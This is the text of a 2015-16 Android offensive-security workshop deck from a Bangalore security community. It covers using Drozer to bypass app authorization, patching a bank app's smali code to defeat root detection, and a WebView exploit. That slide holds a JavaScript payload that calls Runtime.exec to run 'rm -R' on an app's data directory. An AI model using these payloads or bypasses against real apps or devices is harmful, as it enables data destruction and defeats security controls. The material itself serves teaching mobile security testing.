Disclaimer


  • This Presentation is intended for educational purposes only and I cannot be held liable for any kind of damages done whatsoever to your machine, or other damages. 
  • Please - Don't try this attack on any others system without having context knowledge or permission, this may harm to someone directly or indirectly.
  • Feel free to use this presentation for practice or education purpose.
  • It's no way related to my employer - its my own research and  ideas. 


^ I hope - You gotcha ^

 

Humla


Means 'attack' in Hindi


                        

 



Social Media feed

Hashtag for this session

     #NullHumla,  #MobileSecurity


: Twitter handle for feedback :

 @null0x00  @Abhinav_Sejpal


~ We aren't going to do this ~


So, feel free to stop when you have a doubt!

 Are you Ready to Rock ???
Android Smartphone to IOT



The Mobile market is fragmented, stakeholders want their better cheaper faster mobile app - Correct? 


What is if it's has Vulnerable code? WOW :D 
 - Yet to update the stats - 

Android Package - APK



Development Plan



Android Architecture 


My home is your APK 


 


Our Arsenal





Prerequisites Checks


  • Genymotion Emulator
  • Santoku Linux / Appie / Android Tamer  
  • Copy of Shared APK(s) : Here













Drozer Framework

Introduction

  • Drozer Server
  • Drozer Agent 


Bypass the activity validation

      

run app.activity.start --component sh.whisper sh.whisper.WInboxActivity 



Self-Practice Session  


Challenge 1 – Bypass the fix authorization for the whisper App 









nulltest2015@yahoo.in - Password!





 Adhoc Forensic Analysis 




Can we replicate this issue for the LinkedIn / Hike App ?




Linkedin Insecure data stroage




Install the Bank App 

Oh No - I can't use the App due to rooted device  :(

  Smali code Analysis 

Step 1.  Reversing the APK to the JAR File (JavA file)

dex2jar-2.0/d2j-dex2jar.sh bank.apk

Step 2 

Read Jar using JD-GUI


jd-gui bank-dex2jar.jar


Step 3

Reversing the apk to the smali code

java -jar apktool_2.0.0.jar d bank.apk

4. Locate the code which detects the Root 


5. Locate same logic in Jar 



Step 6. Prepare logical patch


We can't patch the Java code and get the binary 

- We have to patch the smali code with new logic of  isRooted 

7. New logic is available in smali


8. Fix the smali code 


9. Rebuild the binary 

10. Create Self-signed certificate 

http://developer.android.com/tools/publishing/app-signing.html

11. Sign apk with jar signer  


12. Check -  Root detection


* Updated apk has patched code *

~  Summary ~  


  • Demo on Missing Root Detection - Done 
  • Demo on Reversing the APK  -  Done
  • Demo on rebuild the APK - Done 
  • Demo on weak Binary - Done 
    • Fix : Use the Dex Guard not the pro guard 
  •  Update the logical validation  - Done 
  • Identify attack surface at Smali code - Done 
  • Demo on Patch the Smali code - Done 
  • Demo on APK signing - Done 
  • Finally done the root detection bypass - Done 

Android Web-view 

Android allows apps to create a bridge in order to render HTML , javascript code  and allow interacting with the java codes of the application using  WebKit open source web browser engine

70% of applications use WebViews 


There is Tweak with usage 
  • Disable Support for JavaScript
  • Disable Support for Plugins
  • Disable File System Access

 

Well - HTTP VS HTTPS


 webview = new WebView(this); webview.getSettings().setJavaScriptEnabled(false); 

Identify the App with the webkit

- Reverse the binary -
Find the webview  code  with addJavascriptinterface  enabled
 - Remember it's smali code - 

    Identify and understand the activity with javascript enable at Clean Java code  


Verify Network is Malicious ?


HTTP VS  Vulnerable HTTPS VS  HTTPS  


Edit  the Response from cloud server   (Man In middle)

Malicious JS Vector 

<script>

var path = '/data/data/com.box.android/databases/---';

function execute(cmd){

document.write("WebView Vulnerability");

return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);

 }

execute(['/system/bin/rm', '-R', path]); 

</script>

Boom - Command has executed successfully 


Bypass the Activity 

+

API Attacks with VK App


Yes - I'm Done!


Feel free to write me at bug.wrangler at outlook.com

Or 

Tweet me at Abhinav_Sejpal


We need you!

  • Attend Null Meets-up & give presentations.
  • Share your ideas & leanings.
  • Talk to our community champions.
  • Your feedback helps us to build a good community.
  • Looking forward for your ongoing support.
 

Say 'Hello' @null0x00


! Thank you ! 


@anantshri  @oldmanlab @adi1391 @prateekg147
@5h1vang @exploitprotocol

 #Nullblr Leads & Champions

Big thank you to @null0x00, Satish, Apoorva & you All

License and Copyrights


https://slides.com/abhinavsejpal/bangalore-android-null-humla/ copyrights 2015-2016 Abhinav Sejpal

-----

 (CC BY-NC-ND 3.0)

Attribution-NonCommercial-NoDerivs 3.0 Unported

 Dedicated to my lovely daddy


Bangalore - Null Humla Android Mobile Application Offensive Security Workshop

By Yogesh Sharma

Bangalore - Null Humla Android Mobile Application Offensive Security Workshop

Our full day Humla session will cover the following topics: • Introduction to Android • Android Security Architecture • Android Permission model • Application Sandboxing • Setting up Android Emulator • Setting up a Mobile Pentest Environment • Reverse Engineering - Understanding, patching and debugging smali code • Investigating app permissions through manifest file • Bypassing Android Permissions • Introduction to Drozer • Using Drozer to find and exploit vulnerabilities • Dynamic and static analysis of the application • Classification of vulnerabilities based on “OWASP Top 10 Mobile Risks”

  • 1,208